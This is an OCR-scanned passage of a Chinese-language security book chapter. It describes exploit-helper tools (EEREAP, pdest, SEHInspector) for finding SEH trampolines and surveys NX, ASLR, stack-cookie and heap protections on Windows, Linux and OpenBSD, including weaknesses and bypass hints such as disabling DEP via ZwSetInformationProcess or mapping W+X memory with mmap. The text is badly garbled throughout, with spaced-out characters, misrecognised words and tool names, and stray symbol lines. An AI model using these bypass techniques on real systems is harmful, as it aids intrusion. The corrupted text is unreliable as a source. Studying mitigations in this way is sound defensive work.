这 个 脚本 并 不 完美 ， 因 为 它 可 能 会 找到 这 样 的 地 址 : 当 使 用 时 可 能 会 用 垃圾 改写 代码 ， 但 在 
大 多 数 情形 里 ， 它 工作 得 还 不 错 。 l 


注解 当前 版 本 的 EEREAP 丝 毫 都 不 具备 SEH 保 护 机 制 ， 因 此 它 可 能 会 很 幸福 地 找到 看 起 来 非常 
好 的 地 址 ， 但 我 们 却 翡 启 地 发 现 这 些 地 址 并 不 在 异常 处 理 程序 允许 的 区 内 。 o 


M —————————— — — ERREUR 











2. Pdest 

Pdest 冻 结 被 攻击 的 进程 并 遍历 代码 ， 执 行 来 自给 定 地 址 的 每 条 指令 ， 直 到 它 到 达 指 定 的 目 
标 或 执行 给 定数 量 的 指令 为 止 。 然 后 再 从 下 一 个 地 址 重新 开始 这 样 的 过 程 。 

看 一 个 例子 ， 你 可 以 用 它 寻 找 合适 的 在 捆绑 异常 处 理 程序 之 后 使 用 的 跳 床 ; 

C:\> pdest vuln.exe 7c839aa8 [esp+8] 

Target = 0022ffe0 - 0022ffe0 

Addresses to try: 7991296 

004016c8 

00401547 

00401574 

00401bb7 

00401cab 

00401eae 

9.4% complete 


它 的 第 一 个 参数 是 将 要 附 上 的 进程 号 或 先 寻 找 然后 附 上 的 应 用 程序 名 。 第 二 个 参数 是 pdest 
将 触发 并 开始 工作 的 地 址 ， 我 们 稍 后 就 会 介绍 。 第 三 个 参数 指定 你 真正 想 跳 到 的 地 方 : 它 可 以 是 
一 个 地 址 或 一 段 地 址 范围 ， 也 可 以 寄存 器 和 寄存 器 加 位 移 等 。 在 这 个 例子 里 使 用 的 是 [esp+8]， 
因为 当 可 以 夺取 执行 流 的 时 候 ， 指 向 代码 的 指针 将 会 出 现 。 这 个 间接 值 将 会 被 转换 成 数字 ， 然 后 
被 使 用 ， 因 此 ， 它 也 会 发 现 使 用 [esp+14] 的 实例 ， 等 等 。 

第 二 个 参数 是 应 当 用 pdest 发 现 的 地 址 所 替换 的 地 址 。 对 于 异常 处 理 程序 ， 最 好 使 用 原始 的 
异常 处 理 程序 。 因 此 ， 用 pqdest 寻 找 合适 的 异常 处 理 程序 跳 床 的 全 过 程 如 下 。 

(1) 运行 脆弱 的 应 用 程序 。 

(2) 用 调试 器 附 上 它 ， 让 它 继续 执行 。 

(3) 生成 异常 (例如 ， 使 用 未 写 完 的 破解 程序 )。 

(4) 当 调 试 器 停 下 来 的 时 候 ， 检 查 当前 的 异常 处 理 程序 是 什么 。 

(5) 退出 调试 器 并 重启 应 用 程序 。 

(6) 用 第 (4) 步 发 现 的 地 址 运行 paest。 

(7) 像 第 3 步 那样 产生 异常 。 

(8) paest 应 当 开 始 工 作 。 

我 们 曾 用 pdaest 找 到 过 非常 有 趣 和 可 靠 的 跳 床 。pdest 和 EERERAP 都 是 破解 程序 时 的 好 大 
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3. SEHInspector 

SEHInspector 有 两 个 用 途 。 其 一 是 ， 如 果 Windows Vista 里 的 PE 被 加 载 到 随机 地 址 ， 它 将 告诉 
你 ， 其 二 是 ， 如 果 应 用 程序 是 用 /SafesEH 编 译 的 ， 它 也 将 告诉 你 ， 而 且 它 会 列 出 所 有 有 效 的 已 
经 注册 过 的 异常 处 理 程序 。 

可 以 用 SEHInspector 处 理 DLI 或 EXxE， 当 处 理 DLL 时 ， 它 将 调用 LoadLibrary ()， 然 后 与 内 存 
里 的 映像 一 起 工作 。 当 处 理 EXE 时 ， 它 将 像 调试 器 那样 启动 被 阻塞 的 应 用 程序 ， 然 后 与 内 存 里 的 
映像 一 起 工作 ， 也 会 列 出 这 个 进程 所 加 载 的 所 有 DLL 的 特征 。 它 唯一 的 命令 行 参 数 是 要 检查 的 PE 
文件 (pLI 或 ExE)， 输 出 的 内 容 很 详细 。 要 了 解 更 多 信息 ， 请 阅读 SEHInspector 的 文档 。 


14.1.8 其 他 保护 机 制 


保护 机 制 很 多 , 到 目前 为 止 , 我 们 介绍 的 大 多 数 保护 措施 都 是 为 预防 执行 外 来 代码 而 设计 的 。 
本 节 将 简单 介绍 其 他 保护 措施 。 我 们 不 准备 介绍 那些 限制 攻击 者 能 力 的 保护 措施 ， 例 如 各 种 类 型 
的 sandboxing、 基 于 角色 的 访问 控制 (RBAC) 以 及 强制 访问 控制 (MAC) 等 。 

1. 内 核 保护 机 制 

本 章 还 没有 专门 来 谈 内 核 保护 ， 然 而 ， 当 它 用 于 预防 内 存 bug 利 用 时 ， 与 到 目前 为 止 所 讨论 
的 所 有 用 户 模 式 保护 措施 没有 什么 差别 。 以 往 的 经 验 表明 内 核 漏洞 是 真实 存在 且 完 全 可 利用 的 ， 
不 论 是 本 地 的 还 是 远程 的 。 现在， 内 核 已 经 成 为 操作 系统 的 组 件 ， 它 里 面 只 实现 一 小 部 分 保护 机 
制 ， 对 破解 程序 作者 来 说 ， 它 已 经 成 为 更 常见 的 目标 。 承认 这 种 问题 存在 并 开始 着 手 做 一 些 事情 
的 公司 很 少 。 

自 2003 年 3.4 版 本 以 来 ，OpenBSD 开 始 用 ProPolice 编 译 内 核 。 至 少 自 2.6.18 版 本 以 来 ， 某 些 平 
人 台 上 的 Linux 内 核准 备用 ProPolice 编 译 了 ， 而 且 一 些 发 行 版 已 经 包括 它 了 。 

某 些 平台 的 OpenBSD 内 核 部 分 支持 W^X。Windows XP 自 SP2 开 始 ，32 位 的 处 理 器 支持 
nx-stack, ，64 位 处 理 器 上 实现 了 更 完善 的 WAX 。 要 想 进 一 步 了 解 后 一 种 情形 ， 请 阅读 
http://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2mempr.mspx « 

此 后 PaX 以 及 它 的 后 续 版 本 也 都 加 入 了 内 核 保 护 机 制 。 

现在 的 PaX， 至 少 在 2007 年 中 期 之 前 ， 有 三 种 不 同 的 内 核 保 护 ， KERNEXEC、UDEREF 和 
RANDKSTACK。 

O KERNEXEC 实现 内 核 里 的 W^X， 确 保 只 有 内 核 的 代码 段 是 可 执行 的 且 不 可 写 。 同 时 ， 它 

把 代码 段 和 rodata 段 设 为 只 读 的 《就 像 它 名 字 所 暗示 的 那样 )。 

a UDEREF 确 保 当 从 (或 向 〉 内 核 复制 数据 时 ， 不 能 访问 来 自用 户 区 的 直接 指针 ， 当 从 (或 
向 ) 用 户 区 复制 数据 时 ， 不 能 使 用 内 核 指 针 。 这 样 就 会 产生 一 个 副作用 : 虽然 NULL 指 针 
在 用 户 区 中 可 能 是 一 个 可 访问 的 地 址 ， 但 对 内 核 来 说 ， 它 将 不 再 是 一 个 有 效 的 地 址 ， 如 
果 在 错误 的 上 下 文 里 访问 它 将 生成 异常 。 

口 RANDKSTACK 确 保 每 一 个 系统 调用 条 目的 内 核 栈 被 随机 化 。 

关于 内 核 保护 ， 我 们 推荐 读者 阅读 pipacs 撰 写 的 有 趣 的 文章 ,文章 介绍 了 PaX 的 现在 和 将 来 ， 
包括 内 核 保 护 、 它 可 能 解决 的 问题 ， 以 及 对 PaX 现 有 弱点 的 细致 分 析 。 可 以 在 PaX 的 文档 中 找到 
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这 篇 文章 : http://pax.grsecurity.net/docs/pax-future.txt. 

2. 指针 保护 

第 一 个 公开 发 布 的 实现 指针 保护 的 或 许 是 vendicator 的 StackShield (0.6 版 )， 它 于 1999 年 9 月 1 
日 发 布 (http:/marc.info?m=94149147721722 )。 这 个 保护 措施 通过 增加 运行 时 检查 〈 它 验证 目标 
地 址 是 否 在 数据 区 的 下 面 ， 在 的 话 就 表明 数据 区 就 是 应 用 程序 的 .text 段 )， 明 确 地 把 间接 函数 调 
用 作为 保护 对 象 。 

儿 年 之 后 ， 在 2003 年 8 月 13 日 ，Crispin Cowan 提出 了 PointGuard ( http://marc.info?m= 
106087892723780 )， 这 是 男 一 种 函数 指针 保护 措施 ， 它 也 保护 所 有 间接 的 函数 调用 (也 称 为 
longjump)。 在 使 用 PointGuard 时 ， 总 会 把 保存 在 内 存 里 的 指针 与 一 个 全 局 随机 值 做 xor 编 码 ， 在 
转移 之 前 ,把 它 移 到 寄存 器 时 将 其 解码 。 尽 管 存在 一 些 独 立 的 GCC 补 丁 , 但 标准 GCC 发 行 版 里 并 
没有 包括 函数 指针 保护 ， 在 它 被 实现 前 (也 就 是 说 GCC 发 行 版 包括 函数 指针 保护 )， 大 多 数 Linux 
发 行 版 里 不 太 可 能 会 看 到 这 些 保护 。 

在 Windows XP SP2 Windows 2003 SP1 里 ， 微 软 公司 引入 两 个 用 于 编码 和 解码 指针 的 函数 
(EncodePointer () 和 DecodePointer())， 它们 的 工作 方式 与 PointGuard 很 相似 。Windows Vista 
里 面 继续 支持 指针 编码 。 

它 在 Windows 上 有 不 止 一 个 实现 (RtlEncodePointer () 和 RtlEncodeSystemPointer () )。 
前 者 用 RtlQueryInformationProcess(-1，0x22，., .) 寻 找 随 机 关键 指针 ， 而 后 者 把 它 保存 在 
所 有 进程 共享 的 全 局 段 里 。 尽 管 这 个 共享 段 是 只 读 的 ,但 如 果 需 要 ， 可 以 从 任何 其 他 的 本 地 进程 
里 读 取 这 个 全 局 关键 指针 ， 并 在 一 些 本 地 攻击 中 使 用 。 


14.2 不同 实现 之 间 的 差异 


日 益 增 加 的 操作 系统 、 发 行 版 和 版 本 数量 ,使 得 跟踪 哪里 实现 了 什么 保护 措施 变 得 不 太 可 能 
了 。 本 节 将 简单 回顾 一 下 大 多 数 的 实现 ， 尝 试 找 出 它们 之 间 的 差异 和 弱点 。 


14.2.1 Windows 
自从 Windows XP 的 SP2 及 Windows 2003 的 SP1 发 布 已 来 ， 微 软 公司 已 经 向 操作 系统 中 增加 了 
不 同 的 保护 机 制 。 在 下 面 的 列表 里 ， 你 可 以 发 现 直 到 Windows Vista 的 不 同 版 本 Windows 里 出 现 的 
保护 机 制 的 摘要 。( 当 然 ， 在 写本 书 的 时 候 ，Windows Vista 中 引入 的 完全 修正 的 范围 也 已 经 被 发 
WT.) 
1. W^X 
a 自 XP SP2 开 始 ，Windows 从 底层 支持 AMD 和 Intel 处 理 器 的 NX 特征 。 
a 默认 安装 的 32 位 Windows 里 ， 只 有 少数 应 用 程序 启用 了 这 个 特征 , 剩 下 的 应 用 程序 可 以 在 
内 存 的 任何 地 方 运行 代码 。 
O 在 不 支持 NX 的 硬件 上 或 者 是 支持 ， 但 没有 启用 )， 结 构 化 异常 处 理 机 制 里 仍 会 嵌入 一 
些 软件 检查 。 只 有 一 小 部 分 微软 组 件 会 默认 启用 这 些 软 机 制 。 
a 要 分 辨 一 个 应 用 程序 是 否 已 经 启用 了 保护 ， 可 以 在 调试 器 里 手动 检验 ， 或 用 Process 
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Explorer 自动 检验 ( http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer. 

mspx )。 启 用 和 禁用 这 个 保护 的 更 多 信息 ， 请 阅读 http://support.microsoft.com/kb/875352。 

在 Windows 里 ， 可 以 调用 ZwSetInformationProcess (-1，0x22， 0x400004，4)， 或 者 

单独 调用 ntdal1.al11 里 某 个 函数 〈 就 像 14.1.2 节 所 介绍 的 那样 )， 从 而 禁用 基于 每 进程 的 

W^X, 

可 以 使 用 VirtualaAlloc()， 从 OS 请 求 W+X 内 存 。 

在 标准 的 应 用 程序 里 没有 段 被 映射 成 W+X。 

在 64 位 的 Windows 里 ， 根 据 官方 文档 的 描述 ， 每 个 应 用 程序 都 默认 启用 WA^X， 并 且 不 能 

被 禁用 。 

2. ASLR 

到 Windows Vista 为 止 的 所 有 版 本 中 ， 不 同 线程 的 栈 内 存 都 是 用 Virtualalloc () 创建 的 。 

因此 ， 它 们 的 地 址 不 是 一 定 可 预计 的 ， 主 线程 可 能 除外 。 

Q 自 Windows XP SP2 开 始 ， 新 进程 启动 时 ，PEB (Process Environment Block， 进 程 环境 块 》 

和 TEB/TIB (Thread Environment/Information Block〉 的 位 置 是 从 一 组 (16 个 ) 已 知 的 地 址 

中 随机 获得 的 。 

引入 这 种 随机 化 很 可 能 是 为 了 预防 BEBLockRoutine 和 PEBUnlockRoutine (这 两 个 函数 

指针 保存 在 PEB 里 ) 的 使 用 ， 破 解 程序 通常 会 通过 改写 它 来 控制 执行 流 。 

O A Windows Vista 开 始 ， 创 建新 进程 时 ， 栈 地 址 和 进程 里 每 个 堆 的 位 置 都 被 随机 化 了 。 实 验 
显示 堆 地 址 大 约 有 8 位 被 随机 化 ， 栈 大 约 有 14 位 。 这 14 位 中 ， 其 中 有 9% 位 是 在 低 11 位 中 ， 因 
此 ， 如 果 攻 击 者 可 以 控制 2kB 以 上 连续 的 栈 空 间 ， 那 么 可 以 有 效 地 把 随机 化 因子 减 至 5 位 。 

Q B Windows Vista 开始 ， 如 果 动 态 链接 库 和 应 用 程序 是 用 Visual Studio 2005 的 
/DYNAMICBASE 选 项 编译 的 ， 那 么 每 次 当 它们 重启 后 ， 动 态 链接 库 和 应 用 程序 加 载 地 址 中 
的 8 位 将 被 随机 化 。 为 了 查 明 给 定 的 DLL 或 EXE 是 否 被 标记 成 动态 基 址 , 你 可 以 使 用 14.1.7 
节 里 介绍 的 SEHInspector。 

口 到 Windows Vista Beta 2 为 止 的 所 有 版 本 中 ， 被 加 载 的 随机 化 库 彼此 之 间 的 距离 都 是 固定 
的 ， 但 是 当 最 后 的 Vista 发 布 时 ， 已 经 不 是 这 样 了 ， 现 在 ，DLL 和 EXE 的 加 载 地 址 完全 是 独 
立 选 择 的 。 经 验 显示 ， 当 多 个 进程 使 用 同一 个 DLL 时 ， 对 所 有 的 实例 来 说 ， 它 的 加 载 地 址 
都 是 一 样 的 。 

3. 栈 数 据 保 护 

Q 自 Windows XP SP2 开 始 ， 所 有 的 Windows 二 进 制 都 是 用 支持 /Gs 选项 的 Visual Studio 版 本 
编译 的 。 其 他 的 微软 软件 包 也 可 能 用 这 个 选项 编译 。 

Q Visual Studio 2005 向 /Gs 保护 中 引入 了 一 些 新 特性 ， 包 括 : 

m canary 〈 或 cookie) 随机 化 ; 

a 用 canary 保 护 帧 指针 和 其 他 的 寄存 器 ; 
a 把 局 部 字 节 数组 移 到 栈 帧 的 结尾 ; 

u 把 指针 局 部 变量 移 到 帧 的 开头 ; 


(m; 


Oc o 


D 


OD 
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s 把 脆弱 的 参数 复制 到 局 部 变量 里 ， 然 后 重新 排序 。 

a 不 是 每 个 函数 (也 不 是 每 个 参数 ) 都 启用 了 /Gs 保护 。 因 此 ， 在 决定 保护 什么 的 逻辑 里 可 
能 存在 问题 。 

O 如 果 没 有 重大 改变 ， 一 些 构造 根本 就 没有 用 这 种 技术 保护 ， 就 像 14.1.3 节 介绍 “理想 的 栈 
布局 时 解释 的 那样 。 

O 异常 处 理 结构 被 放 在 栈 里 。 通 过 恶化 调用 者 (caller〉 的 EXCEPTION_REGISTRATION_ 
RECORD 并 产生 一 个 异常 ， 很 可 能 可 以 绕 过 cookie 检 查 。 

口 在 Windows Vista 之 前 的 所 有 版 本 里 ， 每 个 应 用 程序 或 库 cookie 都 保存 在 固定 的 地 方 。 在 
Windows Vista 里 仍 是 这 样 。 除 非 把 应 用 程序 和 库 加 载 到 随机 地 址 。 把 全 局 cookie 改 成 已 知 
值 也 可 以 绕 过 cookie 检 查 。 

口 在 某 些 情形 里 ，cookie 可 能 没有 被 随机 化 ， 就 像 http://msdn2.microsoft.com/en-US/library/ 
8dbf701c.aspx 所 解释 的 那样 ， 著 名 的 例子 是 MS06-040 漏 洞 。 

u 在 Windows 2003 SP1? 上 ， 脆 弱 的 pr 是 用 /Gs 编 译 的。 就 像 允 许 攻击 者 向 内 存 任何 地 方 写 
入 漏洞 一 样 ， 不 久 前 有 人 公布 了 改写 全 局 cookie 值 的 破解 程序 Chttp://www.milw0rm.com/ 
exploits/2355)。 然 而 ， 我 们 的 测试 显示 ， 这 个 全 局 cookie 事 实 上 根本 没有 被 随机 化 ， 因 为 
从 来 都 没有 调用 过 初始 化 例 程 (而且 , 它 也 不 包含 任何 无 效 的 字 节 , 像 0xbb40e64e 这 样 )。 

4. 堆 保 护 

a Windows XPA SP2 开 始 就 具备 安全 取消 链接 了 ， 但 只 有 把 块 从 空闲 块 的 双向 链表 里 移 走 
的 时 候 ， 它 才 会 检查 。 如 果 安 全 取消 链接 检查 失败 ， 就 不 会 抛 出 异常 ， 带 着 半截 堆 的 应 
用 程序 将 继续 执行 。 

D 在 Windows XP SP2 上 ， 堆 块 的 头 部 增加 了 8 位 随机 cookie。 在 Windows XP SP2 上 ， 如 果 
cookie 检 查 失败 ， 就 不 会 抛 出 异常 ， 攻 击 者 将 有 机 会 继续 尝试 。 

O cookie 保 存在 头 部 中 部 ， 并 没有 保护 HEAP_ENTRY 结 构 的 第 一 个 字段 ， 在 攻击 过 程 中 ， 它 


可 能 会 被 利用 。 
a 在 Windows Vista 引 入 之 前 ， 像 后 备 列表 上 的 块 改写 这 样 的 攻击 是 有 可 能 的 ， 而 且 攻击 效 
果 很 好 。 


a Windows Vista 用 低 碎片 堆 代替 后 备 列表 ， 从 根源 上 切断 了 后 备 列表 上 的 块 改写 技术 。 

o 在 Windows Vista 里 ， 随 机 cookie 被 随机 编码 〔 它 是 所 有 堆 块 头 部 和 做 xor 运 算 后 的 结果 ) 代 
替 了 。 如 果 检 查 失 败 ， 会 有 代码 来 中 止 应 用 程序 ， 但 什么 时 候 使 用 代码 还 不 太 清楚 。 

a 可 以 利用 堆 块 里 的 缓冲 区 溢出 恶化 包含 应 用 程序 数据 的 相 邻 块 。 因 为 在 Windows 上 ，C++ 
编写 的 应 用 程序 比比 皆 是 ， 你 可 以 在 许多 重要 的 应 用 程序 里 找到 合适 的 类 指针 。 在 大 多 
数 情 况 下 ， 花 时 间 研 究 怎样 控制 内 存 分 配 模式 都 会 有 很 大 收获 。 

5. SEH 保 护 机 制 

详 见 14.1.7 节 。 


D 原文 为 SP0， 应 为 SP1。 一 一 译 者 注 
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6. 其 他 的 Windows 实 现 

a 用 户 可 用 RtIEncodePointer () 和 RtlEncodeSystemPointer() 对 函数 指针 (以 及 其 他 敏 

感 的 指针 〉 进 行 编码 。 我 们 建议 只 用 RtlEncodePointer ()， 因为 与 RtlEncodeSystem- 

Pointer() 相 比 ， 它 用 于 保存 随机 关键 指针 的 存储 区 所 在 的 内 存 区 更 安全 一 些 。 

Windows Vista 里 的 SafeSEH 实现 用 RtlEncodeSystemPointer() 代替 了 RtlEncode- 

Pointer()， 这 可 能 会 产生 一 些 漏洞 ,特别 是 对 本 地 利用 来 说 ,除非 机 制 的 安全 不 取决 于 

被 编码 的 指针 〈 在 这 种 情形 里 ， 必 须 有 不 同 的 理由 来 编码 指针 )。 

非常 著名 的 也 是 经 常 被 使 用 的 保存 在 FEB 里 的 函数 指针 PEBLockRoutine 和 

PEBUnlockRoutine 在 Windows Vista 中 已 不 复 存在 了 。 它 们 被 移 走 了 ， 现 在 改 成 直接 调用 

RtlEnterCriticalSection()ZlRtlLeaveCriticalSection(). 

O 驱动 程序 和 内 核 本 身 所 使 用 的 内 核 内 存 自 Windows XP SP2 以 后 就 用 W^X 保 护 了 。 在 32 位 
版 本 上 ，nx-stack 总 是 被 启用 的 ， 而 且 显 然 不 能 被 禁用 。 在 64 位 版 本 上 ， 根 据 微 软 的 文档 
Chttp://www.microsoft.com/technet/prodtechnol/winxppro/maintain/sp2mempr.mspx) 的 说 法 ， 
栈 、 分 页 池 和 会 话 池 〈session pool) 都 被 标 为 不 可 执行 。 


14.2.2 Linux 
因为 Linux 的 发 行 版 太 多 了 ， 因 此 ， 想 完全 说 清楚 已 有 的 保护 机 制 是 非常 复杂 的 。 本 节 尝 ; 
着 把 比较 流行 的 发 行 版 里 存在 的 保护 机 制 总 结 一 下 。 本 节 介 绍 的 例子 都 是 指 默认 安装 的 情况 ， 否 
则 就 很 难 讲 清楚 了 。 
1. WAX 
Q Fedora Core Linux 自 版 本 2 以 后 就 包括 了 ExecShield， 它 的 大 部 分 数据 段 上 都 有 WA^X。 相 应 
版 本 的 Red Hat Enterprise Linux 也 与 它 类 似 。 
口 Fedora Core Linux 版 本 3 以 后 ， 所 有 应 用 程序 里 都 有 映射 的 W+X 段 作为 1ibc 的 一 部 分 。 
QO 在 一 些 〈 默 认 的 ) 32 位 内 核 版 本 上 ，ExecShield 用 分 节 (segmentation》 作 为 W^X 的 基本 机 制 |， 
我 们 可 以 用 类 似 于 OpenBSD 里 的 容 门 使 之 失效 ， 例 如 ， 在 顶部 映射 一 个 可 执行 页 
mmap(Oxbffff000, 0x1000, 7, 0x32, xxxx,0), RA Amprotect () 改变 现 有 页 的 保护 。 
a 可 以 使 用 mmap () 从 OS 请 求 W+X 内 存 。 
Q Mandriva Linux 2007.0 版 默认 情形 没有 启用 任何 W^X 保 护 。 然 而 ， 我 们 在 实验 室 测试 时 发 
现 ，Mandriva Linux 2006.0 版 的 大 多 数 段 上 启用 了 WA^X。 
O Ubuntu 6.10 桌 面 及 老 版 本 默认 没有 启用 WA^X 保 护 ， 然 而 ， 服 务 器 版 本 带 有 mnx-stack。 
口 Ubuntu 的 默认 实现 基于 现代 处 理 器 的 NXPAE 特 性 。 
a 禁止 Ubuntu 的 nx-stack 并 不 像 基于 分 节 〈segmentation-pased) 实现 那么 简单 : 必须 在 正确 
的 内 存 页 上 应 用 mprotect () ， 而 且 还 要 是 将 被 影响 的 页 。 
QO 在 Ubuntu 里 可 以 用 mmap () 映 射 W+X 页 ， 因 此 ， 也 可 以 用 mmap-str-cpy-code。 
口 OpenSUSE 10.1 版 默认 没有 启用 任何 W^X 保 护 。 老 版 本 的 SuSE 9.1 版 和 9.0 版 也 一 样 。 
D 尽管 并 不 会 真 的 存在 像 默 认 Gentoo 安 装 这 样 的 事情 ， 但 它 没 有 任何 W^X， 除 非 从 
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gentoo-hardened 明 确 配 置 grsecurity 或 PaX。 当 启用 WA^X 时 ， 像 前 面 已 经 提 到 的 ， 在 PaX 上 
不 能 获得 WA+X 或 X after WA ZZ. 

2. ASLR 

在 Fedora Core 6 上 ， 默 认 每 个 进程 有 14 位 雁 随 机 化 ， 甚 掩 码 为 0x03fff000; 有 20 位 栈 随 机 
化 ， 其 掩 码 为 0x00fffff0。 

在 Fedora Core 上 ， 可 以 用 名 为 预 链接 的 工具 预 链接 库 。 其 结果 是 ， 每 次 执行 预 链接 时 ， 库 的 
加 载 地 址 都 会 发 生变 化 。 预 链接 默认 每 两 周 运行 一 次 (通过 crontab 脚 本 )。 注 意 ， 这 些 地 址 因 系 
统 的 改变 而 变化 是 很 有 意思 的 。 

a 如 果 没 有 使 用 预 链接 ， 库 也 会 应 用 ExecShield 的 随机 化 。 其 结果 是 10 位 随机 化 ， 其 掩 码 为 
0x003££000. 
对 每 个 进程 来 说 ， 预 链接 都 把 库 加 载 到 同一 地 址 。 一 个 进程 里 的 信息 泄露 可 能 会 透露 其 
他 进程 里 的 库 加 载 到 什么 位 置 。 因 为 预 链 接 默认 使 用 -R 选 项 ， 所 以 每 个 库 的 基 址 是 独立 
选择 的 ， 尽 管 库 映 射 到 内 存 里 的 顺序 仍 保持 原样 。 
自 Fedora Core 4 以 后 ， 程 序 在 每 次 启动 时 都 会 随机 映射 [vaso]， 并 把 它 标 为 不 可 执行 。 
在 Fedora Core 3 之 前 ， 它 总 是 被 映射 到 0xffffe000 且 可 执行 。 
预 链 接 把 库 加 载 到 AAAS 里 面 。 
Fedora Core 把 一 些 “关键 的 ”二 进 制 编译 成 PIE (Position Independent Executable)， 它 们 
将 被 加 载 到 随机 地 址 ， 从 而 使 ret2text 攻 击 难以 执行 。 其 他 的 二 进 制 被 加 载 到 已 知 的 固定 
位 置 (通常 是 0x8048000)。 
D Mandriva Linux 2007.0 版 的 栈 地 址 有 20 位 随机 化 ， 其 掩 码 为 0x00fffff0。 扒 没有 被 随机 

化 ， 库 的 加 载 地 址 有 10 位 随机 化 ， 其 撞 码 是 0x003ff000。 

a Mandriva Linux 2007.0 版 把 库 加 载 到 高 位 地 址 ， 在 AAAS 范 围 外 。 
QO Mandriva Linux 2007.0 版 总 是 把 [vaso] 节 映射 到 0xffffe000。 
a 
a 
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Ubuntu 6.10 桌 面 和 服务 器 版 的 特性 与 Mandriva 一 样 。 
OpenSUSE 10.1 的 特性 与 Mandriva 和 Ubuntu 差不多 。 所 有 这 些 特性 是 ExecShield 的 一 部 分 ， 
现在 也 是 主流 Linux 内 核 的 一 部 分 。 
o 默认 安装 的 Gentoo 也 像 前 面 三 个 一 样 共享 同 样 的 随机 化 参数 ， 外 加 随机 化 的 [vaso] 。 如 
果 安 装 并 启用 gentoo-hardened，PaX 随 机 化 算法 将 会 接管 ， 并 提供 更 好 的 保护 。 
二 进 制 与 [vdsol 在 固定 位 置 时 ， 可 以 使 用 它 执行 所 有 的 ret2text、 一 些 ret2code 及 可 能 芯 
ret2syscall 攻 击 。 
3. 栈 数据 保护 
只 是 从 GCC (在 版 本 4.1 里 ) 采用 ProPolice 以 后 ，Linux 发 行 版 才 开始 使 用 它 。 它 在 Fedora 
Core 里 的 版 本 是 S， 在 Ubuntu 里 的 版 本 是 6.10。 
可 以 检查 给 定 的 发 行 版 是 否 默认 启用 了 这 个 特性 ， 编 译本 章 引 言 部 分 的 C 程 序 ， 用 
objdump -Gd 检查 编译 器 是 否 在 function() 的 prologue 里 增加 了 canary 检 查 。 
GCC4.1 包 括 的 另 一 种 栈 数据 保护 机 制 是 FORTIFY_SOURCE， 如 果 编 译 时 可 以 确定 缓冲 区 的 
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大 小 ， 它 向 脆弱 的 1ibc 函 数 中 加 入 大 小 检查 。 要 想 了 解 FORTIFY_SOURCE 及 其 他 ExecShield 
的 相关 信息 ， 请 阅读 http:/www.redhat.com/magazine/009jul05/features/ execshield/。 
尽管 只 有 GCC 4.1 带 了 FORTIFY_SOURCE, 但 Fedora Core 3 已 经 包括 了 一 些 用 它 编译 的 二 进 制 。 
4. 堆 保 护 
口 堆 保 护 第 一 次 出 现 是 在 glibc-2.3.4 里 ， 最 近 一 次 改良 是 在 glibc-2.3.5 里 。 下 面 列举 了 已 经 引 
入 这 些 保护 的 发 行 版 : 
a Fedora Core 4 
u Mandriva 2006.0 
m Ubuntu 5.10 
m OpenSUSE 10.1 
m Gentoo 2004.3 
“The Malloc Maleficarum” (http://marc.info?m-112906797705156) 可 能 是 攻击 有 堆 检 验 
的 glibc 的 唯一 信息 来 源 。 
a 堆 块 是 一 个 接 一 个 分 配 的 ， 系 统 不 会 在 堆 块 之 间 故 意 留 空 阶 ， 因 此 ， 在 Linux 上 改写 相 邻 
缓冲 区 里 的 敏感 信息 是 非常 有 可 能 的 。 然而， 因为 有 许多 应 用 程序 并 不 是 用 C++ 写 的 ， 所 
以 要 想 找 到 指向 恶化 的 函数 指针 并 不 是 很 容易 ， 例 如 ， 在 Windows 上 就 很 难 找到 。 
5. 其 他 的 Linux 实 现 
a PaX 包 括 了 不 同 的 内 核 保 护 机 制 ， 但 最 大 的 Linux 发 行 版 里 并 没有 默认 安装 它 。 
14.2.3 OpenBSD 
下 面 的 信息 适应 于 OpenBSD 4.1， 其 中 大 多 数 特性 早已 出 现在 OpenBSD 3.84. 
1. WAX 
a 所 有 的 进程 都 默认 启用 它 , 它 可 被 用 于 大 多 数 的 硬件 平台 (至 少 包括 Intel、 sparc、sparc64、 
alpha、amd64、hppa)。 
口 调用 mprotect (0xcfbf????，X，7) 就 可 以 禁用 WA^X。 
a 可 以 使 用 mmap () 从 OS 请 求 W+X 内 存 。 
口 标准 的 应 用 程序 里 没有 节 被 映射 成 W+X。 
口 由 于 使 用 了 __stdcal1 调 用 约定 ，chained ret2code 很 可 能 会 成 功 ， 而 且 会 很 简单 。 
2. ASLR 
a 大 多 数 内 存 节 都 被 随机 化 了 ， 包 括 栈 、 堆 和 库 。 
a 应 用 程序 的 主 代码 节 和 它 的 数据 没有 被 随机 化 。 破 解 程序 可 以 选用 任何 一 种 ret2text 变 体 。 
然而 ， 因 为 所 有 的 二 进 制 在 编译 时 都 使 用 了 栈 数据 保护 ， 所 以 想 要 控制 栈 ， 使 之 符合 执 
行 ret2text 攻 击 所 需要 的 范围 可 就 不 太 容易 了 。 在 不 久 的 将 来 ， 它 在 Intel x86 上 是 不 会 被 随 
机 化 的 ， 但 在 其 他 的 平台 上 已 经 开始 了 。 
a 栈 地 址 低 18 位 中 的 16 位 被 随机 化 ， 使 用 大 垫 片 可 能 会 减少 有 效 的 可 变性 。 
a 库 加 载 地 址 中 的 高 20 位 被 随机 化 。 每 个 库 的 地 址 都 是 独立 选择 的 。 
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O 经 验 显 示 堆 缓冲 区 大 约 有 16 位 被 随机 化 。 

3. 栈 数据 保护 

口 OpenBSD 自 3.4 版 本 以 后 ， 所 有 的 二 进 制 都 是 用 ProPolice 编 译 的 。 下 面 总 结 了 ProPolice 为 
保护 栈 上 的 数据 而 引入 的 机 制 。 
m 随机 canary; 
m 用 canary 保 护 帧 指针 和 其 他 保存 的 寄存 器 ; 
下 局 部 字 节 数组 被 移 到 栈 帧 的 尾部 ; 
四 其 他 的 局 部 变量 被 移 到 帧 头 部 ; 
所 有 的 参数 被 复制 成 本 地 变量 ， 然 后 被 重新 排序 。 

O 函数 没有 启用 ProPolice 保 护 。 决 定 应 该 保护 什么 的 逻辑 可 能 会 出 问题 。 

ü 这 些 技术 如 果 没 有 大 的 改进 ， 将 无 法 从 根本 上 保护 茶 些 构造 《就 像 14.1.3 节 介绍 “理想 的 
栈 布 局 ”时 解释 的 那样 )。 

4. 堆 保 护 

O 堆 块 被 放 在 用 mmap() 从 OS 中 请 求 的 内 存 页 中 。 页 仅 会 由 同样 大 小 的 块 共享 ， 当 页 面 剩 下 
的 空间 不 足以 容纳 一 整 块 时 ， 将 不 会 被 使 用 。 

a 不 同 的 mmap () 调用 返回 区 域 之 间 的 未 映射 的 内 存 空间 将 被 遗弃 ， 因 此 ， 挫 块 里 的 溢出 不 
